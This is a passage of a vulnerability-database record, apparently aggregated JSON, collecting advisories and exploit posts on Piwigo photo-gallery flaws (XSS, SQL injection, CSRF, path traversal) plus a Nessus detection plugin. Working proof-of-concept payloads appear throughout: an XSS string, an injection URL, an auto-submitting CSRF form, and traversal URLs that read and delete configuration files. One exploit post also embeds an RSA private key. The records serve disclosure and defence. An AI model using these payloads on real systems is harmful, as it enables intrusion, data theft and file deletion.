2.7.2 Cross Site Scripting / SQL Injection", "bulletinFamily": "exploit", "cvelist": ["CVE-2013-1468", "CVE-2013-1469", "CVE-2014-1470"], "modified": "2014-12-20T00:00:00", "id": "PACKETSTORM:129665", "href": "https://packetstormsecurity.com/files/129665/Piwigo-2.7.2-Cross-Site-Scripting-SQL-Injection.html", "sourceData": "` -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= \nINDEPENDENT SECURITY RESEARCHER \nPENETRATION TESTING SECURITY \n-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= \n \n \n# Exploit Title: Piwigo - SQL Injection / Cross Site Scripting Vulnerability's \n# Date: 19/12/2014 \n# Url Vendor: http://www.piwigo.org/ \n# Vendor Name: Piwigo \n# Version: 2.7.2 \n# CVE: CVE-2014-1470 \n# CVE References: CVE-2013-1468, CVE-2013-1469 \n# Author: TaurusOmar \n# Tiwtter: @TaurusOmar_ \n# Email: taurusomar13@gmail.com \n# Home: overhat.blogspot.com \n# Tested On: Bugtraq Optimus \n# Risk: High \n \n \nDescription \nPiwigo is a photo gallery software for the web that comes with powerful features to publish and manage your collection of pictures. \n \n \n------------------------ \n+ CROSS SITE SCRIPTING + \n------------------------ \n# Exploiting Description - Get into code xss in the box of group list. \n \n<fieldset> \n<legend>Add Group</legend><p> \n<strong>Name Group</strong><br> \nYOUR GROUP NAME O POC \n<input type=\"text\" size=\"20\" maxlength=\"50\" name=\"groupname\"></p> \n<p class=\"actionButtons\"> \n<input type=\"submit\" value=\"Add\" name=\"submit_add\" class=\"submit\"> \n<a id=\"addGroupClose\" href=\"#\">Cancel</a></p> \n<input type=\"hidden\" value=\"24322c55681c00da423a8a7b21b79640\" name=\"pwg_token\"> \n</fieldset> \n \n#P0c \n\"><img src=x onerror=prompt(1);> \n \n#Proof Concept \nhttp://i.imgur.com/qFyJz6q.jpg \n \n \n------------------------ \n+ Sql Injection + \n------------------------ \n# Exploiting Description - Sql Injection in control panel of admin and others users . \n \n#P0c \nhttp://site.com/piwigo/admin.php?page=history&search_id=5' \n \nSELECT \ndate, \ntime, \nuser_id, \nIP, \nsection, \ncategory_id, \ntag_ids, \nimage_id, \nimage_type \nFROM ucea_history \nWHERE \n; in /home/site.com/public_html/piwigo/include/dblayer/functions_mysqli.inc.php on line 830 \n \n#Proof Concept \nhttp://i.imgur.com/wpzMmmu.jpg \n \n \n-----BEGIN RSA PRIVATE KEY----- \nMIICXQIBAAKBgQD995aYvrD2mK2fwwQr3FoAAprFLfMAiwR8cQUZW2XWDUSNJdvl \nMq/1qym16+Yx7AVmXbsdCzqV/zeX+VUg6fUUWFwzNru6akjOlEHnSpNPxfJaCOEi \n2AFovRie8LJyXtmXf1VFVU7l33/OBUsGJAUa2H4bR8ChTUffSHqkoFLE5wIDAQAB \nAoGBANJgFc/RpqWfM7Pzx7DNh4AaqDpOJc19Wun6dU7b9y+pLe/+PHlP05Kdhp+8 \nGaOg75gsbKNSeeVm1JZ/Y5UwOGJLn06W8PaBgkNG+b6tv9iRV7jSubEscwfGOXSX \nX5Hi9XP02MOrEsqOcgl6Xqpf8//fauhem8a4/iftk2hG3ngBAkEA/4C5QQePSOz/ \nWyypDfUC5Nr5h32zq5bvRY++v7ydzeSRQD8uri66zZuz0gGTzjGdyBUb2OuTDT4R \n8RUcW1x9QQJBAP52GYGDg/+EE7ABX4zT/ZOHJScjlezxbwLiTsvWoESRUrQftLOL \nWvl2IpeYpWvKIjTzyb5WH+IBWPFpM6RfsCcCQQDnqrDOrOsXhYSYB+uVMyYXmhEM \n8EYb/HQhj4+2THCNQoUNSvyphMduLJKkhTeei1B0HeetDRS9uh0Mika29CrBAkAM \nBVg/Hg9mSr8DWY1CAeHAzmma57t1bhJoeHhweLspghP+HmFS+gpaLpKDxtpJtUrY \nZYvqSfdHnfitruKZqUuRAkAti8p7b53+cFSm14WPNtdhJQnxniUcSKBtNm5ExO7J \nX54eZI4iddc9xnP4rySfwz933FhMRF9Eh3gPUYAPBpp/ \n-----END RSA PRIVATE KEY----- \n`\n", "cvss": {"score": 7.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/129665/piwigo272-sqlxss.txt"}], "exploitpack": [{"lastseen": "2020-04-01T19:04:43", "description": "\nPiwigo 2.4.6 - Multiple Vulnerabilities", "edition": 1, "published": "2013-03-01T00:00:00", "title": "Piwigo 2.4.6 - Multiple Vulnerabilities", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2013-1468", "CVE-2013-1469"], "modified": "2013-03-01T00:00:00", "id": "EXPLOITPACK:FC43DD51AE00C5F5F8AE623AD85B84A9", "href": "", "sourceData": "Advisory ID: HTB23144\nProduct: Piwigo\nVendor: Piwigo project\nVulnerable Version(s): 2.4.6 and probably prior\nTested Version: 2.4.6\nVendor Notification: February 6, 2013 \nVendor Patch: February 19, 2013 \nPublic Disclosure: February 27, 2013 \nVulnerability Type: Cross-Site Request Forgery [CWE-352], Path Traversal [CWE-22]\nCVE References: CVE-2013-1468, CVE-2013-1469\nRisk Level: High \nCVSSv2 Base Scores: 7.6 (AV:N/AC:H/Au:N/C:C/I:C/A:C), 4 (AV:N/AC:H/Au:N/C:P/I:N/A:P)\nSolution Status: Fixed by Vendor\nDiscovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) \n\n-----------------------------------------------------------------------------------------------\n\nAdvisory Details:\n\nHigh-Tech Bridge SA Security Research Lab has discovered multiple vulnerabilities in Piwigo, which can be exploited to perform \u0421ross-Site Request Forgery and Path Traversal attacks.\n\n\n1) \u0421ross-Site Request Forgery (CSRF) in Piwigo: CVE-2013-1468\n\nThe vulnerability exists due to insufficient verification of the HTTP request origin in \"/admin.php\" script. A remote attacker can trick a logged-in administrator to visit a specially crafted webpage and create arbitrary PHP file on the remote server.\n\nThe following PoC (Proof of Concept) code creates a file \"file.php\" containing \"phpinfo();\", which can be later accessed via the http://[host]/file.php URL:\n\n\n<form action=\"http://[host]/admin.php?page=plugin-LocalFilesEditor\" method=\"post\" name=\"f1\">\n<input type=\"hidden\" name='edited_file' value='file.php'>\n<input type=\"hidden\" name='text' value=' phpinfo(); '>\n<input type=\"hidden\" name='submit' value='1'>\n<input type=\"submit\" id=\"btn\">\n</form>\n<script>\ndocument.f1.submit();\n</script>\n\n\nSuccessful exploitation requires that the \"LocalFiles Editor\" plugin is enabled (disabled by default).\n\n\n2) Path Traversal in Piwigo: CVE-2013-1469\n\nThe vulnerability exists due to insufficient filtration of user-supplied input in \"dl\" HTTP GET parameter passed to \"/install.php\" script. The script is present on the system after installation by default, and can be accessed by attacker without any restrictions. The vulnerable code is:\n\n\nif (!empty($_GET['dl']) && file_exists(PHPWG_ROOT_PATH.$conf['data_location'].'pwg_'.$_GET['dl']))\n{\n $filename = PHPWG_ROOT_PATH.$conf['data_location'].'pwg_'.$_GET['dl'];\n ...\n echo file_get_contents($filename);\n ...\n}\n\n\nHowever, the vulnerability may be exploited only if PHP 'file_exists' function returns 'true' both for \"C:/boot.ini\" (or any existing file) and for \"C:/any_non_existing_directory/../boot.ini\" (in our case the non-existing directory in path is \"/pwg_/\"). This works in default PHP installation on Windows platform (tested on Windows 7, PHP 5.3.x). In case of successful exploitation remote attacker can read content of arbitrary files on the vulnerable system. \nImportant: after being read the file is deleted (if web server has write permission to it).\n\n\nThe following PoC (Proof of Concept) code will display and delete the application's configuration file:\n\nhttp://piwigo/install.php?dl=/../../local/config/database.inc.php\n\n\n-----------------------------------------------------------------------------------------------\n\nSolution:\n\nUpgrade to Piwigo 2.4.7\n\nMore Information:\nhttp://piwigo.org/releases/2.4.7\nhttp://piwigo.org/bugs/view.php?id=0002843\nhttp://piwigo.org/bugs/view.php?id=0002844\n\n-----------------------------------------------------------------------------------------------\n\nReferences:\n\n[1] High-Tech Bridge Advisory HTB23144 - https://www.htbridge.com/advisory/HTB23144 - Multiple Vulnerabilities in Piwigo.\n[2] Piwigo - http://piwigo.org/ - Piwigo is a photo gallery software for the web, built by an active community of users and developers.\n[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE\u00ae is a dictionary of publicly known information security vulnerabilities and exposures.\n[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types. \n\n-----------------------------------------------------------------------------------------------\n\nDisclaimer: The information provided in this Advisory is provided \"as is\" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References.", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-04-01T19:04:43", "description": "\nPiwigo 2.7.2 - Multiple Vulnerabilities", "edition": 1, "published": "2014-12-19T00:00:00", "title": "Piwigo 2.7.2 - Multiple Vulnerabilities", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2013-1468", "CVE-2013-1469", "CVE-2014-1470"], "modified": "2014-12-19T00:00:00", "id": "EXPLOITPACK:35BF0A351E54F0662E6298A2615F1201", "href": "", "sourceData": " -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\n INDEPENDENT SECURITY RESEARCHER \n PENETRATION TESTING SECURITY\n -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\n \n\n# Exploit Title: Piwigo 2.7.2 - SQL Injection / Cross Site Scripting Vulnerability's \n# Date: 19/12/2014\n# Url Vendor: http://www.piwigo.org/\n# Vendor Name: Piwigo \n# Version: 2.7.2\n# CVE: CVE-2014-1470\n# CVE References: CVE-2013-1468, CVE-2013-1469\n# Author: TaurusOmar\t\n# Tiwtter: @TaurusOmar_\n# Email: taurusomar13@gmail.com\n# Home: overhat.blogspot.com\n# Tested On: Bugtraq Optimus\n# Risk: High\n\n\nDescription\nPiwigo is a photo gallery software for the web that comes with powerful features to publish and manage your collection of pictures.\n\n\n------------------------\n+ CROSS SITE SCRIPTING + \n------------------------\n# Exploiting Description - Get into code xss in the box of group list. \n\n<fieldset>\n<legend>Add Group</legend><p>\n<strong>Name Group</strong><br>\nYOUR GROUP NAME O POC\n<input type=\"text\" size=\"20\" maxlength=\"50\" name=\"groupname\"></p>\n<p class=\"actionButtons\">\n<input type=\"submit\" value=\"Add\" name=\"submit_add\" class=\"submit\">\n<a id=\"addGroupClose\" href=\"#\">Cancel</a></p>\n<input type=\"hidden\" value=\"24322c55681c00da423a8a7b21b79640\" name=\"pwg_token\">\n</fieldset>\n\n#P0c\n\"><img src=x onerror=prompt(1);>\n\n#Proof Concept\nhttp://i.imgur.com/qFyJz6q.jpg\n\n\n------------------------\n+ Sql Injection +\n------------------------\n# Exploiting Description - Sql Injection in control panel of admin and others users . \n\n#P0c\nhttp://site.com/piwigo/admin.php?page=history&search_id=5'\n\nSELECT\n date,\n time,\n user_id,\n IP,\n section,\n category_id,\n tag_ids,\n image_id,\n image_type\n FROM ucea_history\n WHERE \n; in /home/site.com/public_html/piwigo/include/dblayer/functions_mysqli.inc.php on line 830\n\n#Proof Concept\nhttp://i.imgur.com/wpzMmmu.jpg", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}], "htbridge": [{"lastseen": "2020-12-24T11:43:58", "bulletinFamily": "software", "cvelist": ["CVE-2013-1468", "CVE-2013-1469"], "description": "High-Tech Bridge SA Security Research Lab has discovered multiple vulnerabilities in Piwigo, which can be exploited to perform \u0421ross-Site Request Forgery and Path Traversal attacks. \n \n1) \u0421ross-Site Request Forgery (CSRF) in Piwigo: CVE-2013-1468 \nThe vulnerability exists due to insufficient verification of the HTTP request origin in \"/admin.php\" script. A remote attacker can trick a logged-in administrator to visit a specially crafted webpage and create arbitrary PHP file on the remote server. \nThe following PoC (Proof of Concept) code creates a file \"file.php\" containing \"phpinfo();\", which can be later accessed via the http://[host]/file.php URL: \n<form action=\"http://[host]/admin.php?page=plugin-LocalFilesEditor\" method=\"post\" name=\"f1\"> \n<input type=\"hidden\" name='edited_file' value='file.php'> \n<input type=\"hidden\" name='text' value=' phpinfo(); '> \n<input type=\"hidden\" name='submit' value='1'> \n<input type=\"submit\" id=\"btn\"> \n</form> \n<script> \ndocument.f1.submit(); \n</script> \nSuccessful exploitation requires that the \"LocalFiles Editor\" plugin is enabled (disabled by default). \n \n2) Path Traversal in Piwigo: CVE-2013-1469 \nThe vulnerability exists due to insufficient filtration of user-supplied input in \"dl\" HTTP GET parameter passed to \"/install.php\" script. The script is present on the system after installation by default, and can be accessed by attacker without any restrictions. The vulnerable code is: \nif (!empty($_GET['dl']) && file_exists(PHPWG_ROOT_PATH.$conf['data_location'].'pwg_'.$_GET['dl'])) \n{ \n$filename = PHPWG_ROOT_PATH.$conf['data_location'].'pwg_'.$_GET['dl']; \n... \necho file_get_contents($filename); \n... \n} \nHowever, the vulnerability may be exploited only if PHP 'file_exists' function returns 'true' both for \"C:/boot.ini\" (or any existing file) and for \"C:/any_non_existing_directory/../boot.ini\" (in our case the non-existing directory in path is \"/pwg_/\"). This works in default PHP installation on Windows platform (tested on Windows 7, PHP 5.3.x). In case of successful exploitation remote attacker can read content of arbitrary files on the vulnerable system. \nImportant: after being read the file is deleted (if web server has write permission to it). \n \nThe following PoC (Proof of Concept) code will display and delete the application's configuration file: \nhttp://piwigo/install.php?dl=/../../local/config/database.inc.php \n\n", "modified": "2013-02-20T00:00:00", "published": "2013-02-06T00:00:00", "id": "HTB23144", "href": "https://www.htbridge.com/advisory/HTB23144", "type": "htbridge", "title": "Multiple Vulnerabilities in Piwigo", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C/"}}], "zeroscience": [{"lastseen": "2020-11-06T21:17:52", "description": "Title: Piwigo 2.4.6 (install.php) Remote Arbitrary File Read/Delete Vulnerability \nAdvisory ID: [ZSL-2013-5127](<ZSL-2013-5127.php>) \nType: Local/Remote \nImpact: Manipulation of data, Exposure of system information, Exposure of sensitive information \nRisk: (3/5) \nRelease Date: 18.02.2013 \n\n\n##### Summary\n\nPiwigo is a photo gallery software for the web that comes with powerful features to publish and manage your collection of pictures. \n\n##### Description\n\nInput passed to the 'dl' parameter in 'install.php' script is not properly sanitised before being used to get the contents of a resource or delete files. This can be exploited to read and delete arbitrary data from local resources with the permissions of the web server via directory traversal attack. \n \n\\-------------------------------------------------------------------------------- \n \n` /install.php: \n------------- \n \n113: if (!empty($_GET['dl']) && file_exists(PHPWG_ROOT_PATH.$conf['data_location'].'pwg_'.$_GET['dl'])) \n114: { \n115: $filename = PHPWG_ROOT_PATH.$conf['data_location'].'pwg_'.$_GET['dl']; \n116: header('Cache-Control: no-cache, must-revalidate'); \n117: header('Pragma: no-cache'); \n118: header('Content-Disposition: attachment; filename=\"database.inc.php\"'); \n119: header('Content-Transfer-Encoding: binary'); \n120: header('Content-Length: '.filesize($filename)); \n121: echo file_get_contents($filename); \n122: unlink($filename); \n123: exit(); \n124: } \n` \n\\-------------------------------------------------------------------------------- \n \n\n\n##### Vendor\n\nPiwigo project - <http://www.piwigo.org>\n\n##### Affected Version\n\n2.4.6 \n\n##### Tested On\n\nMicrosoft Windows 7 Ultimate SP1 (EN) \nApache 2.4.2 (Win32) \nPHP 5.4.4 \nMySQL 5.5.25a \n\n##### Vendor Status\n\n[15.02.2013] Vulnerability discovered. \n[15.02.2013] Initial contact with the vendor. \n[15.02.2013] Vendor responds asking more details. \n[16.02.2013] Sent details to the vendor. \n[16.02.2013] Vendor confirms the vulnerability. \n[16.02.2013] Working with the vendor. \n[18.02.2013] Vendor releases fix for this issue. \n[18.02.2013] Coordinated public security advisory released. \n[19.02.2013] Vendor releases version 2.4.7. \n\n##### PoC\n\n[piwigo_rd.txt](<../../codes/piwigo_rd.txt>)\n\n##### Credits\n\nVulnerability discovered by Gjoko Krstic - <[gjoko@zeroscience.mk](<mailto:gjoko@zeroscience.mk>)>\n\n##### References\n\n[1] <http://piwigo.org/bugs/view.php?id=2843> \n[2] <http://cxsecurity.com/issue/WLB-2013020126> \n[3] <http://www.exploit-db.com/exploits/24520> \n[4] <http://packetstormsecurity.com/files/120380> \n[5] <http://piwigo.org/releases/2.4.7> \n[6] <http://www.osvdb.org/show/osvdb/90357> \n[7] <http://www.securityfocus.com/bid/58016> \n[8] <http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1469>\n\n##### Changelog\n\n[18.02.2013] - Initial release \n[19.02.2013] - Added reference [3] and [4] \n[20.02.2013] - Added vendor status and reference [5] and [6] \n[21.02.2013] - Added reference [7] \n[02.03.2013] - Added reference [8] \n\n##### Contact\n\nZero Science Lab \n \nWeb: <http://www.zeroscience.mk> \ne-mail: [lab@zeroscience.mk](<mailto:lab@zeroscience.mk>)\n", "edition": 12, "published": "2013-02-18T00:00:00", "title": "Piwigo 2.4.6 (install.php) Remote Arbitrary File Read/Delete Vulnerability", "type": "zeroscience", "bulletinFamily": "exploit", "cvelist": ["CVE-2013-1469"], "modified": "2013-02-18T00:00:00", "id": "ZSL-2013-5127", "href": "http://zeroscience.mk/en/vulnerabilities/ZSL-2013-5127.php", "sourceData": "\nPiwigo 2.4.6 (install.php) Remote Arbitrary File Read/Delete Vulnerability\n\n\nVendor: Piwigo project\nProduct web page: http://www.piwigo.org\nAffected version: 2.4.6\n\nSummary: Piwigo is a photo gallery software for the web that comes\nwith powerful features to publish and manage your collection of\npictures.\n\nDesc: Input passed to the 'dl' parameter in 'install.php' script\nis not properly sanitised before being used to get the contents of\na resource or delete files. This can be exploited to read and delete\narbitrary data from local resources with the permissions of the web\nserver via directory traversal attack.\n\n====================================================================\n/install.php:\n-------------\n\n113: if (!empty($_GET['dl']) && file_exists(PHPWG_ROOT_PATH.$conf['data_location'].'pwg_'.$_GET['dl']))\n114: {\n115: $filename = PHPWG_ROOT_PATH.$conf['data_location'].'pwg_'.$_GET['dl'];\n116: header('Cache-Control: no-cache, must-revalidate');\n117: header('Pragma: no-cache');\n118: header('Content-Disposition: attachment; filename=\"database.inc.php\"');\n119: header('Content-Transfer-Encoding: binary');\n120: header('Content-Length: '.filesize($filename));\n121: echo file_get_contents($filename);\n122: unlink($filename);\n123: exit();\n124: }\n\n====================================================================\n\n\nTested on: Microsoft Windows 7 Ultimate SP1 (EN)\n Apache 2.4.2 (Win32)\n PHP 5.4.4\n MySQL 5.5.25a\n\n\nVulnerability discovered by Gjoko 'LiquidWorm' Krstic\n @zeroscience\n\n\nAdvisory ID: ZSL-2013-5127\nAdvisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2013-5127.php\n\nVendor Patch: http://piwigo.org/bugs/view.php?id=2843\n\n\n\n15.02.2013\n\n\n--\n\nhttp://localhost/piwigo/install.php?dl=../../../../../../lio_passwords.txt\n\n", "cvss": {"score": 4.0, "vector": "AV:N/AC:H/Au:N/C:P/I:N/A:P"}, "sourceHref": "http://zeroscience.mk/en/vulnerabilities/../../codes/piwigo_rd.txt"}], "nessus": [{"lastseen": "2021-01-01T04:55:03", "description": "The version of Piwigo hosted on the remote web server is affected by a\ndirectory traversal vulnerability because it fails to properly sanitize\nuser-supplied input to the 'dl' parameter of the 'install.php' script. \nThis vulnerability could allow an unauthenticated, remote attacker to\nread and delete arbitrary files by forming a request containing\ndirectory traversal sequences. \n\nNote that the application is reportedly also affected by a cross-site\nrequest forgery vulnerability, although Nessus has not tested this.", "edition": 27, "cvss3": {"score": 6.5, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:L"}, "published": "2013-04-02T00:00:00", "title": "Piwigo install.php dl Parameter Traversal Arbitrary File Access", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-1469"], "modified": "2021-01-02T00:00:00", "cpe": ["cpe:/a:piwigo:piwigo"], "id": "PIWIGO_INSTALL_FILE_DISCLOSURE.NASL", "href": "https://www.tenable.com/plugins/nessus/65769", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(65769);\n script_version(\"1.8\");\n script_cvs_date(\"Date: 2019/11/27\");\n\n script_cve_id(\"CVE-2013-1469\");\n script_bugtraq_id(58016);\n script_xref(name:\"EDB-ID\", value:\"24520\");\n\n script_name(english:\"Piwigo install.php dl Parameter Traversal Arbitrary File Access\");\n script_summary(english:\"Tries to view an arbitrary file\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server contains a PHP script that is affected by a\ndirectory traversal vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Piwigo hosted on the remote web server is affected by a\ndirectory traversal vulnerability because it fails to properly sanitize\nuser-supplied input to the 'dl' parameter of the 'install.php' script. \nThis vulnerability could allow an unauthenticated, remote attacker to\nread and delete arbitrary files by forming a request containing\ndirectory traversal sequences. \n\nNote that the application is reportedly also affected by a cross-site\nrequest forgery vulnerability, although Nessus has not tested this.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.htbridge.com/advisory/HTB23144\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.zeroscience.mk/en/vulnerabilities/ZSL-2013-5127.php\");\n script_set_attribute(attribute:\"see_also\", value:\"http://piwigo.org/release-2.4.7\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to version 2.4.7 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:H/Au:N/C:P/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:L\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2013-1469\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No exploit is required\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_nessus\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2013/02/18\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/02/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/04/02\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:piwigo:piwigo\");\n script_end_attributes();\n\n script_category(ACT_DESTRUCTIVE_ATTACK);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2013-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"piwigo_detect.nasl\");\n script_require_keys(\"www/PHP\", \"www/piwigo\");\n script_exclude_keys(\"Settings/disable_cgi_scanning\");\n script_require_ports(\"Services/www\", 80);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"webapp_func.inc\");\n\nport = get_http_port(default:80);\n\ninstall = get_install_from_kb(\n appname : \"piwigo\",\n port : port,\n exit_on_fail : TRUE\n);\n\ndir = install[\"dir\"];\ninstall_url = build_url(port:port, qs:dir);\n\nurl = \"/install.php?dl=../../../install.php\";\n\nres = http_send_recv3(\n method : \"GET\",\n item : dir + url,\n port : port,\n exit_on_fail : TRUE\n);\n\nif (\n \"<?php\" >< res[2] &&\n \"if (isset($_POST['install']))\" >< res[2]\n)\n{\n # Grab vulnerable code section for report\n out = strstr(res[2], \"if (!empty($_GET['dl'])\");\n # Truncate to 15 lines\n count = 0;\n foreach line (split(out))\n {\n output += line;\n count ++;\n if (count >= 15) break;\n }\n\n if (report_verbosity > 0)\n {\n snip = crap(data:\"-\", length:30)+' snip '+ crap(data:\"-\", length:30);\n report =\n '\\nNessus was able to verify the issue exists using the following request :' +\n '\\n' +\n '\\n' + install_url + url +\n '\\n' +\n '\\nNote that the file \"install.php\" has been deleted by the request above.' + '\\n';\n if (report_verbosity > 1)\n {\n report +=\n '\\n' + 'This produced the following truncated output :' +\n '\\n' +\n '\\n' + snip +\n '\\n' + chomp(output) +\n '\\n' + snip +\n '\\n';\n }\n security_warning(port:port, extra:data_protection::sanitize_user_paths(report_text:report));\n }\n else security_warning(port);\n exit(0);\n}\nelse audit(AUDIT_WEB_APP_NOT_AFFECTED, \"Piwigo\", install_url);\n", "cvss": {"score": 4.0, "vector": "AV:N/AC:H/Au:N/C:P/I:N/A:P"}}]}